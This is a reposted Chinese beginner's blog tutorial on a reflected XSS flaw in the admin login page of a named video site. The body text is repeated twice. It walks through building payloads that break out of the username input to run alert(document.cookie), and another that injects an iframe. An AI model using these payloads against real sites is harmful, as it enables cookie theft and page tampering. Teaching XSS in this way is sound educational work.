土豆网某反射型XSS详细分析 - 网站安全 - 自学p

外面下大雪，奶奶的，哪里想起来上课咯。。。冷的老子要死，我操上午三四节课打酱油路过之后吃完东西回到寝室。。网络小新发了我个土豆的后台，说我 xss 。我觉得这后台真 JB 有意思这里感谢下小新哈。。。我博客的空间也是小新赞助的，嘿嘿。。。 http://cms.tudou测试数据/center/system/login.do 很明显，开源的 cms 。。。。那么。。我们右键查看源码截图可能不太清楚，我这里复制下 <label> 用户名： </label><input type="text" name="userName" value="" id="userName"/> 用户名的 value 值我们是可控的。。。那么。构造语句。从 <input> 标签开始分析下。 <input type="text" name="userName" value="" "id="userName"/> value='' " 两个 " " 之间是我们写的东西下面这么来，弹出个 cookie 。。 ( 现在不是都喜欢这么来嘛 ) 先把前面的 <input 闭合下，我这里填入 1" > <input type="text" name="userName" value=" 1" > " id="userName"/> OK ，这样就闭合了前面的 input 标签了那么还剩下一段 " id="userName"/> 我们可以在中间随意的注入上我们的 html 代码了这样 <script>alert(document.cookie)</script> 那么。就会弹出我们想要的东东了。后面剩下的 "id="userName"/> 会作为字符串显示在网页上、这样 "id="userName"/> 被显示在了网页上了、那么，继续把它构造完整吧。。先整理下现在的语句。 <input type="text" name="userName" value=" 1" > <script>alert(document.cookie)</script> " id="userName"/> 到 </script> 这里。。前面都构造的比较完美。我们看看后面，那么接下来我们想个东西来接上剩下的 " id="userName"/> 也就是现在的关键只要连上这个 " 就 OK 了这样吧。。我重新加个 <input> 标签这样 <input type=]text" value=" 猴子好可怜那么。连上后面的 " id="userName"/> 整个语句也就是 <input type=]text" value=" 猴子好可怜 " id="userName"/> 很完美的构造好了效果是多了一行框，里面的值是猴子好可怜，现在后面不会有错误了。我们来看看查看下源码整条语句用户名： </label><input type="text" name="userName" value="1"><script>alert(document.cookie)</script><input type="text" value=" 猴子 JJ" id="userName"/> 我们插入的是 1"><script>alert(document.cookie)</script><input type="text" value=" 猴子 JJ 当然了，在 <script> 这你也可以写其他的 HTML 标签，这个随意的只要正确就 OK 的、比如这里插入个网页的。用 iframe 吧 1"><iframe src="http:// HdhCmsTest2cto测试数据 " width="500" hight="500"><input type="text" value=" 猴子 JJ 用 iframe 的时候记得定义宽度和高度。不然不显示的之所以说这个后台有意思用户名这个 input 标签没有定义长度。所以说可以任意长度，最多不超过 255 就行， ( 好像是 255 吧 ) 反射型的 XSS 危害没有存储型的 XSS 危害大这个大家都知道存储型的有些可以发展成蠕虫。 ( 关键是看管理员的过滤 ) ，这里大学城某地方就是一个很好的例子本篇是写给从来没接触过 xss 的兄弟，我觉得是个很好的例子，又没啥危害啥的。而且我感觉可以讲的比较详细，所以就拿出来讲了只要你认真看完，就会觉得文章的精彩之前我对 XSS 也没有过多的看中，没啥研究，自从上次从深圳回来，发现数据流和街球以及一些基友说现在 XSS 比较普遍和恼火，所以才开始重视对 xss 的研究。我还是个新手，希望 xss 大神能多多带我下。。。。小弟感激不尽呀。。 ~ 以身相许、外面下大雪，奶奶的，哪里想起来上课咯。。。冷的老子要死，我操上午三四节课打酱油路过之后吃完东西回到寝室。。网络小新发了我个土豆的后台，说我 xss 。我觉得这后台真 JB 有意思这里感谢下小新哈。。。我博客的空间也是小新赞助的，嘿嘿。。。 http://cms.tudou测试数据/center/system/login.do 很明显，开源的 cms 。。。。那么。。我们右键查看源码截图可能不太清楚，我这里复制下 <label> 用户名： </label><input type="text" name="userName" value="" id="userName"/> 用户名的 value 值我们是可控的。。。那么。构造语句。从 <input> 标签开始分析下。 <input type="text" name="userName" value="" "id="userName"/> value='' " 两个 " " 之间是我们写的东西下面这么来，弹出个 cookie 。。 ( 现在不是都喜欢这么来嘛 ) 先把前面的 <input 闭合下，我这里填入 1" > <input type="text" name="userName" value=" 1" > " id="userName"/> OK ，这样就闭合了前面的 input 标签了那么还剩下一段 " id="userName"/> 我们可以在中间随意的注入上我们的 html 代码了这样 <script>alert(document.cookie)</script> 那么。就会弹出我们想要的东东了。后面剩下的 "id="userName"/> 会作为字符串显示在网页上、这样 "id="userName"/> 被显示在了网页上了、那么，继续把它构造完整吧。。先整理下现在的语句。 <input type="text" name="userName" value=" 1" > <script>alert(document.cookie)</script> " id="userName"/> 到 </script> 这里。。前面都构造的比较完美。我们看看后面，那么接下来我们想个东西来接上剩下的 " id="userName"/> 也就是现在的关键只要连上这个 " 就 OK 了这样吧。。我重新加个 <input> 标签这样 <input type=]text" value=" 猴子好可怜那么。连上后面的 " id="userName"/> 整个语句也就是 <input type=]text" value=" 猴子好可怜 " id="userName"/> 很完美的构造好了效果是多了一行框，里面的值是猴子好可怜，现在后面不会有错误了。我们来看看查看下源码整条语句用户名： </label><input type="text" name="userName" value="1"><script>alert(document.cookie)</script><input type="text" value=" 猴子 JJ" id="userName"/> 我们插入的是 1"><script>alert(document.cookie)</script><input type="text" value=" 猴子 JJ 当然了，在 <script> 这你也可以写其他的 HTML 标签，这个随意的只要正确就 OK 的、比如这里插入个网页的。用 iframe 吧 1"><iframe src="http://HdhCmsTestsbmonkey测试数据" width="500" hight="500"><input type="text" value=" 猴子 JJ 用 iframe 的时候记得定义宽度和高度。不然不显示的之所以说这个后台有意思用户名这个 input 标签没有定义长度。所以说可以任意长度，最多不超过 255 就行， ( 好像是 255 吧 ) 反射型的 XSS 危害没有存储型的 XSS 危害大这个大家都知道存储型的有些可以发展成蠕虫。 ( 关键是看管理员的过滤 ) ，这里大学城某地方就是一个很好的例子本篇是写给从来没接触过 xss 的兄弟，我觉得是个很好的例子，又没啥危害啥的。而且我感觉可以讲的比较详细，所以就拿出来讲了只要你认真看完，就会觉得文章的精彩之前我对 XSS 也没有过多的看中，没啥研究，自从上次从深圳回来，发现数据流和街球以及一些基友说现在 XSS 比较普遍和恼火，所以才开始重视对 xss 的研究。我还是个新手，希望 xss 大神能多多带我下。。。。小弟感激不尽呀。。 ~ 以身相许

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did14408

更新时间：2022-09-13 阅读：50次